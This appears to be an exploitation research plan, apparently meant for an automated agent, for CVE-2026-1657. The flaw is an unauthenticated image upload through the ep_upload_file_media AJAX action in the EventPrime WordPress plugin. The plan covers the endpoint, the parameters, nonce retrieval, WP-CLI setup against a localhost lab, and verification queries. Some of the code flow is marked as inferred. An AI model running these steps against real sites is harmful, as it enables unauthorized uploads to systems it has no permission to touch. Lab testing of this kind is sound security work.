Exploitation Research Plan: CVE-2026-1657

1. Vulnerability Summary

Vulnerability: Missing Authorization to Unauthenticated Image Upload.
Plugin: EventPrime – Events Calendar, Bookings and Tickets (slug: eventprime-event-calendar-management).
Affected Versions: <= 4.2.8.4.
Vulnerable Endpoint: admin-ajax.php via the ep_upload_file_media action.
Description: The plugin registers the ep_upload_file_media AJAX action for unauthenticated users (wp_ajax_nopriv_) but fails to implement any authorization checks (e.g., current_user_can), authentication requirements, or nonce verification. This allows an unauthenticated attacker to upload image files, which are then processed by WordPress and added to the Media Library.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: ep_upload_file_media
• Method: POST
• Required Capability: None (Unauthenticated)
• Content-Type: multipart/form-data
• Payload Parameters:
  • action: ep_upload_file_media
  • file: (The image file to be uploaded)
  • nonce: (Inferred) The code likely looks for a nonce parameter even if it doesn't verify it properly.

3. Code Flow (Inferred)

1. Entry Point: admin-ajax.php receives a request with action=ep_upload_file_media.
2. Hook Registration: The plugin registers the action in its AJAX handler class (likely includes/class-eventprime-ajax.php or similar):

   add_action('wp_ajax_ep_upload_file_media', array($this, 'ep_upload_file_media'));
   add_action('wp_ajax_nopriv_ep_upload_file_media', array($this, 'ep_upload_file_media'));
   

3. Vulnerable Function: The ep_upload_file_media() function is invoked.
4. Missing Check: The function proceeds to process $_FILES without calling check_ajax_referer() or current_user_can().
5. Sink: The code likely uses media_handle_upload() or wp_handle_upload() to save the file and wp_insert_attachment() to register it in the database.

4. Nonce Acquisition Strategy

The vulnerability description states that a nonce is created but not verified. However, to ensure the request is processed correctly by any internal logic that might check for the presence of a parameter, we will attempt to retrieve it.

1. Identify Script Localization: EventPrime typically localizes frontend settings in a global JS object.
2. Shortcode Setup: The script is likely loaded on pages containing the Event Submission or Booking shortcodes.
   • Shortcode: [ep_event_submission] (inferred)
3. Acquisition Steps:
   • Create a page with the shortcode: wp post create --post_type=page --post_status=publish --post_content='[ep_event_submission]'
   • Navigate to the page.
   • Use browser_eval to check for common EventPrime nonce objects:
     • window.ep_ajax?.nonce
     • window.eventprime_vars?.nonce
     • window.ep_frontend_options?.nonce

If no nonce is found or required, the exploit will proceed with a dummy or missing nonce parameter.

5. Exploitation Strategy

Step 1: Discover Parameters

Since the exact file parameter name might vary, the first step is to attempt an upload with the most common WordPress file parameter name (file).

Step 2: Multipart POST Request

Send the following request using the http_request tool:

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: multipart/form-data
• Body:
  • action: ep_upload_file_media
  • file: (Binary content of a valid image, e.g., poc_image.png)
  • nonce: (Retrieved nonce or dummy value)

Step 3: Payload Construction

The payload should be a legitimate image file (PNG/JPG) to bypass basic getimagesize() or MIME-type checks often found in wp_handle_upload.

6. Test Data Setup

1. Plugin Installation: Ensure EventPrime <= 4.2.8.4 is installed and active.
2. Public Page:

   wp post create --post_type=page --post_title="Submit Event" --post_status=publish --post_content='[ep_event_submission]'
   

3. Local File: Create a simple 1x1 pixel PNG file named exploit.png.

7. Expected Results

• Response Code: 200 OK
• Response Body: Usually a JSON response containing an attachment ID or the URL of the uploaded image. E.g., {"success":true,"data":{"id":123,"url":"..."}}.
• Side Effect: A new entry appears in the wp_posts table with post_type='attachment' and the file exists in wp-content/uploads/Y/m/exploit.png.

8. Verification Steps

After executing the HTTP request, verify the upload via WP-CLI:

1. Check Media Library:

   wp media list --fields=ID,post_title,file --format=table
   

   Look for exploit.png in the list.

2. Verify File Existence:

   find /var/www/html/wp-content/uploads/ -name "exploit.png"
   

3. Check Database Entry:

   wp db query "SELECT ID, post_title, post_type FROM wp_posts WHERE post_title='exploit' AND post_type='attachment';"
   

9. Alternative Approaches

If file is not the correct parameter name, try:

• ep_file
• upload_file
• async-upload

If the request requires a specific event context, try adding a dummy event_id=1 or post_id=1 to the POST body.

If the nopriv action specifically checks for the Referer or User-Agent, ensure those match a standard browser request.